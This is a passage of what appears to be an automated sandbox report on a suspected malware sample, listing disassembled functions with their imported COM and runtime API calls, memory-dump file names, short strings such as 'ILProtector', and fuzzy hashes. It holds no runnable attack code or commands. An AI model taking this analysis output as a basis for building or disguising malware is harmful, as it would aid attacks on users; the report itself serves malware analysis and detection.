Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Part of subcall function 6CEADFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEADFF6
Part of subcall function 6CEADFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAE003
Part of subcall function 6CEADFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEAE02F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID:
API String ID: 959723449-0
Opcode ID: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
Instruction ID: 3aa5995d154473a305c297a15ee04e6741f78cdf6ffe5ef7f2b67b0440c3a944
Opcode Fuzzy Hash: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
Instruction Fuzzy Hash: C6C18F74A012059FDB10DF68CD80FA9B7B9AF85308F308599E919FB786CB71E985CB50

Function 6CEB4170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEB41AF
VariantInit.OLEAUT32(?), ref: 6CEB41B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB41C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB41F5
VariantClear.OLEAUT32(?), ref: 6CEB4201
std::tr1::_Xweak.LIBCPMT ref: 6CEB4450
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB446D
VariantClear.OLEAUT32(?), ref: 6CEB447D
VariantClear.OLEAUT32(?), ref: 6CEB4483

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 78b11c7478e6ab1eae823c7e956470da449f65e3253a8a775db51448cbfc044e
Instruction ID: 1bc8960bb8751cc7cfca56a182659abd884971cac4af510a96c5396f11feaae3
Opcode Fuzzy Hash: 78b11c7478e6ab1eae823c7e956470da449f65e3253a8a775db51448cbfc044e
Instruction Fuzzy Hash: 31B13775A006499FCB14DF98C884EAAB7F5BF8D310F15856DE50AABB90DA34F841CB60

Function 6CEBC850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEBC88F
VariantInit.OLEAUT32(?), ref: 6CEBC895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBC8D5
VariantClear.OLEAUT32(?), ref: 6CEBC8E1
std::tr1::_Xweak.LIBCPMT ref: 6CEBCB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBCB39
VariantClear.OLEAUT32(?), ref: 6CEBCB49
VariantClear.OLEAUT32(?), ref: 6CEBCB4F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 74a678c7a253dd49f250105ec9cbffe5c353b26a59fea35b691626cb25473791
Instruction ID: 7864d73406864d48faeeca5b3ed3b02e09fb693c36b2fd5ee79acb619d86f571
Opcode Fuzzy Hash: 74a678c7a253dd49f250105ec9cbffe5c353b26a59fea35b691626cb25473791
Instruction Fuzzy Hash: D6B13875A046099FCB14DF98C984EBEB7F5BF8D310F15856CE506ABB91C634B841CB60

Function 6CEBC530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEBC56F
VariantInit.OLEAUT32(?), ref: 6CEBC575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBC5B5
VariantClear.OLEAUT32(?), ref: 6CEBC5C1
std::tr1::_Xweak.LIBCPMT ref: 6CEBC7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBC7F1
VariantClear.OLEAUT32(?), ref: 6CEBC801
VariantClear.OLEAUT32(?), ref: 6CEBC807

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 83aedd6a4b0091825b834b3679ac3a803feb18a174cfaee20d635b6da43e8509
Instruction ID: 7bd64ac9999304d0b49b38d9a7abcd1fdb2c822af18c26743720429a7e30095f
Opcode Fuzzy Hash: 83aedd6a4b0091825b834b3679ac3a803feb18a174cfaee20d635b6da43e8509
Instruction Fuzzy Hash: 32A14975A046099FCB14DFA8C884EBAB7F9BF8D310F15856CE506ABB50C734B841CB60

Function 6CEB6880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEB68B2
VariantInit.OLEAUT32(?), ref: 6CEB68BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEB68D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB68FD
VariantClear.OLEAUT32(?), ref: 6CEB6909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB6923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6981
VariantClear.OLEAUT32(?), ref: 6CEB699E
VariantClear.OLEAUT32(?), ref: 6CEB69A4

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: 9496b37e3f3cec220d603b31d0926dc4e8e347dc5310668fb09f9751b748fc03
Instruction ID: f67ad633416f79294b8ee3202882cd1c459a3b16391e40d87a3839d42dc09a29
Opcode Fuzzy Hash: 9496b37e3f3cec220d603b31d0926dc4e8e347dc5310668fb09f9751b748fc03
Instruction Fuzzy Hash: A3417DB2E00209AFDB01DFA5C844AEEBBB8FF99324F154119E905F7740E771A905CBA0

Function 6CEADB30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEADB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEADB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEADB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADBF1
VariantClear.OLEAUT32(?), ref: 6CEADBFB

Strings

9Kl, xrefs: 6CEADBA6, 6CEADBD6, 6CEADBAE
1l, xrefs: 6CEADB46

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID: 9Kl$1l
API String ID: 182531043-2405703077
Opcode ID: ff6b637934ccfeeb55a4da09d5b6a1acb3338e7494e1e86a13aa20908e9fcc56
Instruction ID: 3ae8540f844e8ca1092200a766f698c422af76554187acf717f10eb180b878c4
Opcode Fuzzy Hash: ff6b637934ccfeeb55a4da09d5b6a1acb3338e7494e1e86a13aa20908e9fcc56
Instruction Fuzzy Hash: 1931A57AA00205AFD701DF95C844EEEBBF9FF89724F158159ED11AB700D734A901CBA0

Function 6CEAC020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEAC074
VariantInit.OLEAUT32(?), ref: 6CEAC07B
VariantInit.OLEAUT32(?), ref: 6CEAC082
VariantInit.OLEAUT32(?), ref: 6CEAC089
VariantClear.OLEAUT32(?), ref: 6CEAC312
VariantClear.OLEAUT32(?), ref: 6CEAC319
VariantClear.OLEAUT32(?), ref: 6CEAC320
VariantClear.OLEAUT32(?), ref: 6CEAC327

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 9456429eaaa911abd40fe35348b3e9818f4f256f5d6c8237cf03c14e7bfa1434
Instruction ID: 682f827f06271e716cebc6abc3cbe6680a6e79ee1bc494cd7ae1d5bca07d2e87
Opcode Fuzzy Hash: 9456429eaaa911abd40fe35348b3e9818f4f256f5d6c8237cf03c14e7bfa1434
Instruction Fuzzy Hash: FCC148727087009FC300EF98C88095AB7F5BFC9708F258A4DE5989B765D771E84ACB92

Function 6CEA16B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::tr1::_Xweak.LIBCPMT ref: 6CEA1B53
std::_Xinvalid_argument.LIBCPMT ref: 6CEA1B5D
std::exception::exception.LIBCMT ref: 6CEA1C43
__CxxThrowException@8.LIBCMT ref: 6CEA1C58

Strings

invalid vector<T> subscript, xrefs: 6CEA1B58

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: invalid vector<T> subscript
API String ID: 3098024973-3016609489
Opcode ID: b0c7f577d584db1019a61e2eb453c250312b86e4218c9a60381797cd8321dc73
Instruction ID: 9fbb82f36d07775f44f7ba1a60c0a73f36940e08716a45f1ec0c799af42908ee
Opcode Fuzzy Hash: b0c7f577d584db1019a61e2eb453c250312b86e4218c9a60381797cd8321dc73
Instruction Fuzzy Hash: E2222775900709DFCB14CFE4C4809EEBBB5BF44314F218A5DD45AABB50E774AA89CB90

Function 6CEF9BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CEF9BCF

Part of subcall function 6CEF9D66: __FF_MSGBANNER.LIBCMT ref: 6CEF9D7F
Part of subcall function 6CEF9D66: __NMSG_WRITE.LIBCMT ref: 6CEF9D86
Part of subcall function 6CEF9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEF9DAB

std::exception::exception.LIBCMT ref: 6CEF9C04
std::exception::exception.LIBCMT ref: 6CEF9C1E
__CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Strings

Ql, xrefs: 6CEF9BF7, 6CEF9BFA

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: Ql
API String ID: 615853336-532227320
Opcode ID: 300daa17bfdc90f1c8271fb690d810f747b76f6802fd254c9c0780743ad37481
Instruction ID: 2263be4087347037e84fce1e555bca0eba9779f9c1bce0bbfb1a12aa8ccb06aa
Opcode Fuzzy Hash: 300daa17bfdc90f1c8271fb690d810f747b76f6802fd254c9c0780743ad37481
Instruction Fuzzy Hash: BEF0F431911509AADF50EF64C821AED7AB9AB8271CF30080DE4A097F80CB718A4A8690

Function 6CEA6C60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CEA6C73
SafeArrayAccessData.OLEAUT32(00000000,<ll), ref: 6CEA6C87
_memmove.LIBCMT ref: 6CEA6C9A
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEA6CA3

Strings

<ll, xrefs: 6CEA6C64, 6CEA6C7B, 6CEA6C7E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
String ID: <ll
API String ID: 3147195435-3419007484
Opcode ID: 5e4b6bfbb15caf23edc2e0ae0e3d47a595d8c7ea6478c178e9cc62931fc5a81b
Instruction ID: 85910e033972bdc39ccb69b226d39aafe190acae3c658740aff1f10bffdf15b0
Opcode Fuzzy Hash: 5e4b6bfbb15caf23edc2e0ae0e3d47a595d8c7ea6478c178e9cc62931fc5a81b
Instruction Fuzzy Hash: 3EF05E75711214BBEB115F91DC8AF973FBDEFD6B64F018015FA188E640E6B0D5009BA1

Function 6CEC1FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEC2206
__CxxThrowException@8.LIBCMT ref: 6CEC2221

Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6518
Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6558

Strings

@-l .l, xrefs: 6CEC21AD
ILProtector, xrefs: 6CEC2045

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$_mallocstd::exception::exception
String ID: @-l .l$ILProtector
API String ID: 84431791-4089254471
Opcode ID: 1163fa9f0e252e42e71e53c6320b6acde9c76ec27ad549f518fe6c70a0458f53
Instruction ID: e605fd4598ee1dbbfc6ba361f6147492068bfcd420c655aafe1c7031c5840e3d
Opcode Fuzzy Hash: 1163fa9f0e252e42e71e53c6320b6acde9c76ec27ad549f518fe6c70a0458f53
Instruction Fuzzy Hash: D3713875E052599FCB14CFA8C984BEEBBB4FB59304F1081AED419A7740DB346A44CF91

Function 6CEFA42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__CRT_INIT@12.LIBCMT ref: 6CEFA463
__CRT_INIT@12.LIBCMT ref: 6CEFA493
__CRT_INIT@12.LIBCMT ref: 6CEFA4B3

Strings

a0, xrefs: 6CEFA4FF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: T@12
String ID: a0
API String ID: 456891419-3188653782
Opcode ID: c9d9c9bbd9903d9e8f95e14174af0e165bd3984c3b32323d6a9c3c00f399bf54
Instruction ID: 53ee02c774b21a092d3826e5533515c8c80750a4c371b3bc85267037b3994c75
Opcode Fuzzy Hash: c9d9c9bbd9903d9e8f95e14174af0e165bd3984c3b32323d6a9c3c00f399bf54
Instruction Fuzzy Hash: 9B112770D4169269DB309E778C4CFAF7ABC9B8179DF319418A475EBB40D734C542CAA0

Function 6CEA9110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CEA9170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CEA9191

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
